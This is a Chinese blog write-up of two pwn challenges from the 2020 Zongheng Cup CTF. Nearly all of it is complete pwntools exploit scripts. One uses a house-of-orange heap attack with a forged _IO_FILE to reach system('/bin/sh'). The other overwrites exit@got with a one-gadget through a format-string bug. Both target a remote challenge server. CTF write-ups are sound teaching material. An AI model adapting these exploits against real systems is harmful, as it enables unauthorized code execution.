2020纵横杯 pwn writeup

发表于 | 分类于

wind_farm_panel

堆溢出,没有free,house of orange 一把梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
#coding:utf-8
from pwn import *
import sys

local = 0
context.terminal=['tmux','splitw','-h']
if len(sys.argv) == 2 and (sys.argv[1] == 'DEBUG' or sys.argv[1] == 'debug'):
    context.log_level = 'debug'

if local:
    p = process('./pwn')
    elf = ELF('./pwn')
    libc = elf.libc
else:
    p = remote("182.92.203.154","28452")
    elf = ELF('./pwn')
    libc = elf.libc

#内存地址随机化
def debug(addr=0,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        print "breakpoint_addr --> " + hex(text_base + 0x202040)
        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(p,"b *{}".format(hex(addr))) 

sd = lambda s:p.send(s)
rc = lambda s:p.recv(s)
sl = lambda s:p.sendline(s)
ru = lambda s:p.recvuntil(s)
sda = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)

def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    payload = pack_file(_flags = 0,
                        _IO_read_ptr = 0x61, #smallbin4file_size
                        _IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
                        _IO_write_base = 0,
                        _IO_write_ptr = 1,
                        _IO_buf_base = binsh_addr,
                        _mode = 0,
                       )
    payload += p64(_IO_str_jumps_addr-8)  # vtable
    payload += p64(0) # paddding
    payload += p64(system_addr)
    return payload

def get_io_str_jumps_offset(libc):
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            # print possible_IO_str_jumps_offset
            return possible_IO_str_jumps_offset

def house_of_orange_payload(libc, libc_base):
  io_str_jump = libc_base + get_io_str_jumps_offset(libc)
  io_list_all = libc_base + libc.symbols['_IO_list_all']
  system = libc_base + libc.symbols['system']
  bin_sh = libc_base + next(libc.search('/bin/sh'))
  payload = pack_file_flush_str_jumps(io_str_jump, io_list_all, system, bin_sh)
  return payload

def show(name,addr):
	log.info(name + " --> %s",hex(addr))

def choice(idx):
    sla(">> ",str(idx))

def add(idx,size,data):
    choice(1)
    sla("): ",str(idx))
    sla("turbine: ",str(size))
    sda("name: ",data)

def view(idx):
    choice(2)
    sla("viewed: ",str(idx))

def edit(idx,data):
    choice(3)
    sla("turbine: ",str(idx))
    sda("input: ",data)

pay = 0x108*'a' + p64(0xef1)
add(0,0x100,pay)
add(1,0xf00,'bbb')
add(2,0x80,'a')
view(2)
ru("turbine is ")
main_arena = u64(rc(6).ljust(8,'\x00')) - 1601
malloc_hook = main_arena - 0x10
libc_base = malloc_hook - libc.symbols['__malloc_hook']
show("main_arena",main_arena)
show("libc_base",libc_base)
pay = house_of_orange_payload(libc,libc_base)

edit(0,0x190*'a' + pay)
# debug()
choice(1)
sla("): ",str(3))
sla("turbine: ",str(0x100))
# debug()


p.interactive()

shell

格式化字符串漏洞,藏在eval -> builtin_cmd -> do_bgfg里面

got表可写,且可向栈写入数据,所以直接改exit@got即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#coding:utf-8
from pwn import *
import sys

local = 1
context.terminal=['tmux','splitw','-h']
if len(sys.argv) == 2 and (sys.argv[1] == 'DEBUG' or sys.argv[1] == 'debug'):
    context.log_level = 'debug'

if local:
    p = process('./pwn')
    elf = ELF('./pwn',checksec = False)
    libc = elf.libc
else:
    p = remote("182.92.203.154","35264")
    elf = ELF('./pwn',checksec = False)
    libc = elf.libc

#内存地址随机化
def debug(addr=0,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        print "breakpoint_addr --> " + hex(text_base + 0x202040)
        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(p,"b *{}".format(hex(addr))) 

sd = lambda s:p.send(s)
rc = lambda s:p.recv(s)
sl = lambda s:p.sendline(s)
ru = lambda s:p.recvuntil(s)
sda = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)

def show(name,addr):
	log.info(name + " --> %s",hex(addr))

# debug(0x1616)
sla("$ ","bg %10$p-%11$p-%303$p")
stack = int(ru('-')[:-1],16)
buf_stack = stack + 0x4f0
text_base = int(ru('-')[:-1],16) - 0x153b
libc_start_main = int(ru(':')[:-1],16)  - 240
libc_base = libc_start_main - libc.symbols['__libc_start_main']
exit_got = text_base + elf.got['exit']
printf_got = text_base + elf.got['printf']
show("stack",stack)
show("exit_got",exit_got)
show("text_base",text_base)

one = [0x45226,0x4527a,0xf0364,0xf1207]
main_ret = stack + 0x908
onegadget = libc_base + one[0]
show("main_ret",main_ret)
show("buf_stack",buf_stack)
show("onegadget",onegadget)

def change_exit(i):
    offset = (onegadget >> 8*i) & 0xff
    pay = "bg "
    pay += "%" + str(offset) + "c%174$hhn"
    pay = pay.ljust(0x10,"A")
    pay += p64(exit_got + i)
    # debug(0x1616)
    sla("$ ",pay)

for i in range(6):
    change_exit(i)

# debug(0x1064)
sla("$ ",'quit')
p.interactive()
0%